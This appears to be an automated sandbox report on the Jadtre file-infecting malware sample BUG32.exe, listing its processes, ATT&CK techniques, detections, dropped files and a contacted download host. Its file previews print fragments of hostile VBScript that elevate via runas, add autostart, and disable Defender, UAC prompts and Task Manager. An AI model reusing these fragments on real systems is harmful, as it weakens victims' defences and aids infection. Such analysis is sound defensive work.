    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\input\es-419\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\microsoft\input\es-bo\*.*" "*.exe"Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ren "c:\users\user\appdata\local\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\application data\history\history.ie5\mshist012023100420231005\*.*" "*.exe"Jump to behavior
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb VolumeInformation
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb VolumeInformation
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb VolumeInformation
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb VolumeInformation
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb VolumeInformation
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: \Device\CdRom0\ VolumeInformation
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeCode function: 1_2_00AE1718 GetSystemTimeAsFileTime,SHSetValueA,SHGetValueA,__aulldiv,__aulldiv,1_2_00AE1718
    Source: C:\Users\user\Desktop\BUG32.exeCode function: 0_2_00409881 LoadLibraryA,GetProcAddress,GetVersionExA,0_2_00409881
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Lowering of HIPS / PFW / Operating System Security Settings

    barindex
    Source: C:\Windows\System32\wscript.exeRegistry value created: DisableTaskMgr 1Jump to behavior
    Source: C:\Windows\System32\wscript.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableRegistrytoolsJump to behavior
    Source: C:\Windows\System32\wscript.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: Process Memory Space: aJEWGt.exe PID: 6164, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: Process Memory Space: aJEWGt.exe PID: 6164, type: MEMORYSTR
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information212
    Scripting
    1
    Replication Through Removable Media
    2
    Native API
    212
    Scripting
    1
    DLL Side-Loading
    31
    Disable or Modify Tools
    1
    Input Capture
    11
    System Time Discovery
    1
    Taint Shared Content
    1
    Archive Collected Data
    2
    Ingress Tool Transfer
    Exfiltration Over Other Network Medium1
    Data Encrypted for Impact
    CredentialsDomainsDefault Accounts1
    Exploitation for Client Execution
    1
    DLL Side-Loading
    1
    Access Token Manipulation
    2
    Obfuscated Files or Information
    LSASS Memory11
    Peripheral Device Discovery
    Remote Desktop Protocol1
    Input Capture
    1
    Encrypted Channel
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    Command and Scripting Interpreter
    1
    Registry Run Keys / Startup Folder
    11
    Process Injection
    12
    Software Packing
    Security Account Manager5
    File and Directory Discovery
    SMB/Windows Admin SharesData from Network Shared Drive11
    Non-Standard Port
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal Accounts1
    PowerShell
    Login Hook1
    Registry Run Keys / Startup Folder
    1
    DLL Side-Loading
    NTDS14
    System Information Discovery
    Distributed Component Object ModelInput Capture2
    Non-Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
    Masquerading
    LSA Secrets11
    Security Software Discovery
    SSHKeylogging12
    Application Layer Protocol
    Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    Virtualization/Sandbox Evasion
    Cached Domain Credentials1
    Virtualization/Sandbox Evasion
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    Access Token Manipulation
    DCSync1
    Application Window Discovery
    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
    Process Injection
    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1482692 Sample: BUG32.exe Startdate: 26/07/2024 Architecture: WINDOWS Score: 100 63 ddos.dnsnb8.net 2->63 67 Multi AV Scanner detection for domain / URL 2->67 69 Antivirus detection for dropped file 2->69 71 Antivirus / Scanner detection for submitted sample 2->71 73 11 other signatures 2->73 10 BUG32.exe 23 2->10         started        signatures3 process4 file5 39 C:\Users\user\AppData\Local\Temp\aJEWGt.exe, PE32 10->39 dropped 41 C:\Users\user\AppData\Local\Temp\...\jsc.exe, PE32 10->41 dropped 43 C:\Users\user\AppData\Local\Temp\...\ad.exe, PE32 10->43 dropped 45 C:\Users\user\AppData\Local\Temp\...\CB7E.vbs, ASCII 10->45 dropped 83 Potential malicious VBS script found (suspicious strings) 10->83 14 wscript.exe 17 10->14         started        18 aJEWGt.exe 14 10->18         started        signatures6 process7 dnsIp8 47 C:\BUG32\jsc.exe, PE32 14->47 dropped 49 C:\BUG32\ad.exe, PE32 14->49 dropped 51 C:\BUG32\runner.vbs, ASCII 14->51 dropped 61 3 other malicious files 14->61 dropped 85 Benign windows process drops PE files 14->85 87 Potential malicious VBS script found (suspicious strings) 14->87 89 Drops PE files to the document folder of the user 14->89 95 2 other signatures 14->95 21 wscript.exe 1 14->21         started        65 ddos.dnsnb8.net 44.221.84.105, 49704, 799 AMAZON-AESUS United States 18->65 53 C:\Users\user\AppData\Local\...\6C7D10EA.exe, PE32 18->53 dropped 55 C:\Program Files\7-Zip\Uninstall.exe, PE32 18->55 dropped 57 C:\Program Files (x86)\AutoIt3\...\SciTE.exe, PE32 18->57 dropped 59 C:\Program Files (x86)\AutoIt3\...\MyProg.exe, MS-DOS 18->59 dropped 91 Detected unpacking (changes PE section rights) 18->91 93 Infects executable files (exe, dll, sys, html) 18->93 file9 signatures10 process11 process12 23 wscript.exe 6 4 21->23         started        file13 31 winrt--{S-1-5-21-2....searchconnector-ms, PE32 23->31 dropped 33 C:\Users\user\Links\Downloads.lnk, PE32 23->33 dropped 35 C:\Users\user\Links\Desktop.lnk, PE32 23->35 dropped 37 328 other malicious files 23->37 dropped 75 Creates an undocumented autostart registry key 23->75 77 Drops executable to a common third party application directory 23->77 79 Infects executable files (exe, dll, sys, html) 23->79 81 4 other signatures 23->81 27 wmplayer.exe 23->27         started        29 cmd.exe 23->29         started        signatures14 process15

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    BUG32.exe88%VirustotalBrowse
    BUG32.exe96%ReversingLabsWin32.Virus.Jadtre
    BUG32.exe100%AviraW32/Jadtre.B
    BUG32.exe100%Joe Sandbox ML
    SourceDetectionScannerLabelLink
    C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Jadtre.B
    C:\Program Files\7-Zip\Uninstall.exe100%AviraW32/Jadtre.B
    C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%AviraW32/Jadtre.B
    C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
    C:\Program Files\7-Zip\Uninstall.exe100%Joe Sandbox ML
    C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%Joe Sandbox ML
    C:\BUG32\ad.exe35%ReversingLabsWin32.Trojan.Generic
    C:\BUG32\ad.exe49%VirustotalBrowse
    C:\BUG32\jsc.exe46%ReversingLabsByteCode-MSIL.Trojan.RanSerKD
    C:\BUG32\jsc.exe65%VirustotalBrowse
    C:\Users\user\AppData\Local\.curlrc35%ReversingLabsWin32.Trojan.Generic
    C:\Users\user\AppData\Local\.curlrc49%VirustotalBrowse
    C:\Users\user\AppData\Local\.exe35%ReversingLabsWin32.Trojan.Generic
    C:\Users\user\AppData\Local\.exe49%VirustotalBrowse
    C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\000003.exe35%ReversingLabsWin32.Trojan.Generic
    C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\000003.exe49%VirustotalBrowse
    C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\000003.log35%ReversingLabsWin32.Trojan.Generic
    C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\000003.log49%VirustotalBrowse
    C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\CURRENT35%ReversingLabsWin32.Trojan.Generic
    C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\CURRENT49%VirustotalBrowse
    C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\CURRENT.exe35%ReversingLabsWin32.Trojan.Generic
    C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\CURRENT.exe49%VirustotalBrowse
    C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_035%ReversingLabsWin32.Trojan.Generic
    C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_049%VirustotalBrowse
    C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_0.exe35%ReversingLabsWin32.Trojan.Generic
    C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_0.exe49%VirustotalBrowse
    C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_135%ReversingLabsWin32.Trojan.Generic
    C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_149%VirustotalBrowse
    C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_1.exe35%ReversingLabsWin32.Trojan.Generic
    C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_1.exe49%VirustotalBrowse
    C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_2.exe35%ReversingLabsWin32.Trojan.Generic
    C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_2.exe49%VirustotalBrowse
    C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_3.exe35%ReversingLabsWin32.Trojan.Generic
    C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_3.exe49%VirustotalBrowse
    C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\index.exe35%ReversingLabsWin32.Trojan.Generic
    C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\index.exe49%VirustotalBrowse
    C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\05349744be1ad4ad_035%ReversingLabsWin32.Trojan.Generic
    C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\05349744be1ad4ad_049%VirustotalBrowse
    C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\05349744be1ad4ad_0.exe35%ReversingLabsWin32.Trojan.Generic
    C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\05349744be1ad4ad_0.exe49%VirustotalBrowse
    No Antivirus matches
    SourceDetectionScannerLabelLink
    ddos.dnsnb8.net13%VirustotalBrowse
    No Antivirus matches
    NameIPActiveMaliciousAntivirus DetectionReputation
    ddos.dnsnb8.net
    44.221.84.105
    truefalse
    NameMaliciousAntivirus DetectionReputation
    http://ddos.dnsnb8.net:799/cj//k1.rartrue
      NameSourceMaliciousAntivirus DetectionReputation
      http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DEaJEWGt.exe, 00000001.00000002.2636089334.0000000000AE3000.00000002.00000001.01000000.00000004.sdmp, aJEWGt.exe, 00000001.00000003.2025242800.0000000000FF0000.00000004.00001000.00020000.00000000.sdmpfalse
        http://ddos.dnsnb8.net:799/cj//k1.rar1aJEWGt.exe, 00000001.00000003.2074977882.000000000159A000.00000004.00000020.00020000.00000000.sdmptrue
          http://ddos.dnsnb8.net:799/cj//k1.rarMQXaJEWGt.exe, 00000001.00000002.2637496286.000000000152E000.00000004.00000020.00020000.00000000.sdmptrue
            http://ddos.dnsnb8.net:799/cj//k1.rarpaJEWGt.exe, 00000001.00000002.2639403569.00000000030BA000.00000004.00000010.00020000.00000000.sdmptrue
              http://ddos.dnsnb8.net:799/cj//k1.rarqnaJEWGt.exe, 00000001.00000002.2637496286.000000000154A000.00000004.00000020.00020000.00000000.sdmptrue
                http://ddos.dnsnb8.net:799/cj//k1.rarLQXaJEWGt.exe, 00000001.00000002.2637496286.000000000152E000.00000004.00000020.00020000.00000000.sdmptrue
                  http://ddos.dnsnb8.net:799/cj//k1.rar9aJEWGt.exe, 00000001.00000003.2074977882.000000000159A000.00000004.00000020.00020000.00000000.sdmptrue
                    http://ddos.dnsnb8.net/aJEWGt.exe, 00000001.00000003.2074977882.000000000159A000.00000004.00000020.00020000.00000000.sdmptrue
                      http://ddos.dnsnb8.net:799/cj//k1.rarhQYaJEWGt.exe, 00000001.00000002.2637496286.000000000154A000.00000004.00000020.00020000.00000000.sdmptrue
                        http://ddos.dnsnb8.net:799/cj//k1.rarHQXaJEWGt.exe, 00000001.00000002.2637496286.000000000152E000.00000004.00000020.00020000.00000000.sdmptrue
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          44.221.84.105
                          ddos.dnsnb8.netUnited States
                          14618AMAZON-AESUSfalse
                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1482692
                          Start date and time:2024-07-26 02:33:43 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 15m 13s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Run name:Run with higher sleep bypass
                          Number of analysed new started processes analysed:2023
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:1
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:BUG32.exe
                          Detection:MAL
                          Classification:mal100.rans.spre.troj.evad.winEXE@1431/383@3/1
                          EGA Information:
                          • Successful, ratio: 66.7%
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 45
                          • Number of non-executed functions: 63
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                          • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 52.165.165.26, 13.85.23.206, 52.182.143.212, 40.127.240.158, 52.165.164.15
                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, atm-settingsfe-prod-geo2.trafficmanager.net, login.live.com, glb.cws.prod.dcat.dsp.trafficmanager.net, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, settings-prod-neu-1.northeurope.cloudapp.azure.com, umwatson.events.data.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                          • Execution Graph export aborted for target wmplayer.exe, PID 428 because there are no executed function
                          • Not all processes where analyzed, report is missing behavior information
                          • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtCreateFile calls found.
                          • Report size getting too big, too many NtCreateKey calls found.
                          • Report size getting too big, too many NtEnumerateKey calls found.
                          • Report size getting too big, too many NtNotifyChangeKey calls found.
                          • Report size getting too big, too many NtOpenFile calls found.
                          • Report size getting too big, too many NtOpenKey calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                          • Report size getting too big, too many NtWriteVirtualMemory calls found.
                          TimeTypeDescription
                          02:34:48AutostartRun: WinLogon Shell wscript.exe "C:\bug32\runner.vbs"
                          20:35:33API Interceptor52453x Sleep call for process: jsc.exe modified
                          No context
                          No context
                          No context
                          No context
                          No context
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 35%
                          • Antivirus: Virustotal, Detection: 49%, Browse
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):182
                          Entropy (8bit):4.894015571157464
                          Encrypted:false
                          SSDEEP:3:WHiAHmOt8oQ/FERMQsmA6Es9ov6JC2xA8IlHHb4EHl37WIIXW3HypFRv:fG0tz6Es9UGMau5WIePrJ
                          MD5:052BC547687F4B9136A4D21CCB9BE339
                          SHA1:897DFC37A8D89C9FBE390F9663495A2940457100
                          SHA-256:2B1C03EC095BAA8004183D2D9DC2A42D012C22969EE9923215CF73982E4BB122
                          SHA-512:85E9A4092ED12D426FC5903C4F576B0085B3E794060382A87B8C8C871139A7968DD43B797088E303F4583374551102E4DC064B9B1E8AF4FE89AB20799A981A31
                          Malicious:true
                          Reputation:unknown
                          Preview:set objShell = createobject("Shell.Application")..dim buhu.. buhu="C:\bug32\jaq.vbs" .... ObjShell.ShellExecute "wscript.exe", """" & buhu & """ RunAsAdministrator", , "runas", 1 ..
                          Process:C:\Windows\System32\wscript.exe
                          File Type:MS Windows cursor resource - 1 icon, 32x32, hotspot @0x0
                          Category:dropped
                          Size (bytes):2238
                          Entropy (8bit):1.5350554441040605
                          Encrypted:false
                          SSDEEP:12:CWh5ekgF/eYspRLwXxlJpxvyXX4tykpl7lKslttaR04Otit6xl5:7zsp6zL0fvcX4tyUV3jtk0LtXl5
                          MD5:664A5626D7F9F5B991976B7C2FCD6176
                          SHA1:CAFDD6179DF723C7A7DCFA96A774FD2DC92EF40F
                          SHA-256:691BBBAD6B1D9B7C010CF63976E55E9C2B06EC0E9B29A7F16D8CF3B28E408CF8
                          SHA-512:D4F1EB1DAC1404219915F882AEAC2544F82465D8BF84D9AF0E03FA671A4F0798CA42FCD801CCE9715C05A06732A03EC31189943A4A001137F3A022A4B89991B7
                          Malicious:false
                          Reputation:unknown
                          Preview:...... ..............(... ...@...................................222.>>>...P...P..2P..Js.JJJ.VVV.bbb..b...z......H.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\System32\wscript.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):29
                          Entropy (8bit):4.021268494903765
                          Encrypted:false
                          SSDEEP:3:+Y7w9yz:+Y7wO
                          MD5:9DBBDC7D01EA45C41F089D9C345B8100
                          SHA1:C0D429A5E3A6E729583E6BCF0599A62466CCFBE2
                          SHA-256:9A3CFE496CF2C6B1EFCBA29320353194B3974EBEB49CADCBF83A72745C50FEF6
                          SHA-512:530E8DBE050C7A073FF0EFBF6E117F6BF86AD856EC43B8A7FAEFC495F603503A6E18994D8CB778F66AD1077904F64C7189B5A2C10C8899EBB6DCAAF5C4F3461E
                          Malicious:true
                          Reputation:unknown
                          Preview:do..wscript.sleep 15000..loop
                          Process:C:\Windows\System32\wscript.exe
                          File Type:RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, stereo 44100 Hz
                          Category:dropped
                          Size (bytes):1572944
                          Entropy (8bit):7.53763637867198
                          Encrypted:false
                          SSDEEP:49152:Vr2U5IahDUGN97rkqOAackLjQ0rZEAh3oW:NH2ahFNNrg3QbQoW
                          MD5:FAE94D96AC61B8D57365151E142ED9F4
                          SHA1:BF9B9BE54DCDADC9D8CDF427C16DC5CA9C8C28A8
                          SHA-256:86F9017CF6F3C95A43922E5E5C58D71CBC82064A78895B531D1F5AA368EA5B63
                          SHA-512:7B0D7026017DEA8AA70975C023160E340CAC7474BAE5BEEDFB906F7378D033BB67C44B1C7085AC34EF061008ECD0CF545449E1DA624C1408CDA1E649AB1CA49D
                          Malicious:false
                          Reputation:unknown
                          Preview:RIFFH...WAVEfmt ........D.............LIST....INFOISFT....Lavf55.19.100.data............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\System32\wscript.exe
                          File Type:MS Windows icon resource - 1 icon, 64x64, 32 bits/pixel
                          Category:dropped
                          Size (bytes):16958
                          Entropy (8bit):4.92784283329369
                          Encrypted:false
                          SSDEEP:192:rktjVwu4plNx2jO1pI9ZkzdXe51pN/uS/2qUC1osKnAysD51fk:AtjIplNx2jQcaJuDpNWS+qPKnG51fk
                          MD5:E22AB01202357460EEC9871C74E6212B
                          SHA1:D16C867A6A32769B1CDAB2CE2E37D4D7D48570B7
                          SHA-256:1BD0DBDBE78D8218968CF3D5F203ABF52824870A39610C505E8FBA695FD329BB
                          SHA-512:9535AD5C9D4B94EC525AB643E4F0FF37868465AE892F16C3465A5C0FC49A0BDB2075053BF1948502902E04996EF7DD3B8FA7DC6B9BE4CB756DDFBD76544EB507
                          Malicious:false
                          Reputation:unknown
                          Preview:......@@.... .(B......(...@......... ......@............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          Process:C:\Windows\System32\wscript.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4102
                          Entropy (8bit):5.436945462499387
                          Encrypted:false
                          SSDEEP:96:3wzKdo+fVYlaqJEJo7FUdo+fVYlaqJEClc4:ZXScXClc4
                          MD5:E77AAD670E295B9849A0D3D4F8501EC2
                          SHA1:0F0061209C15A0184BACFE87FF67C80A7283DED5
                          SHA-256:C1FFAC115387D943660D11ACEA27A06A920F505A0F3142969C25C9FA2E830B6F
                          SHA-512:D2E9144A666600D407922A968CA8705F286D9B52FF43873A96A61FB39C63E11AD5D67E405CD5A95659D6309FC729B67269D19D405A9A2C9C8E18C2863515B760
                          Malicious:true
                          Reputation:unknown
                          Preview:set x = createobject("Wscript.shell")..set c = createobject("Scripting.FilesystemObject")..set objShell = createobject("Shell.Application")..on error resume next....'####################################################################..dim userad..userad=x.EXpandEnvironmentStrings("%USERNAME%")....if c.FileExists("C:\bug32\fst.msi") then..else..x.run "wmplayer.exe"..x.RegWrite"HKCU\SOFTWARE\Policies\Microsoft\Windows\System\DisableCMD","0","REG_DWORD"..x.RegWrite"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","1","REG_DWORD"..x.RegWrite"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistrytools","1","REG_DWORD"..x.RegWrite"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys","1","REG_DWORD"..x.RegWrite"HKLM\Software\Policies\Microsoft\windows defender\disableantispyware","1","REG_DWORD"..x.RegWrite"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin","0","REG_DWORD"..x.
                          Process:C:\Windows\System32\wscript.exe
                          File Type:ASCII text, with CRLF line terminators
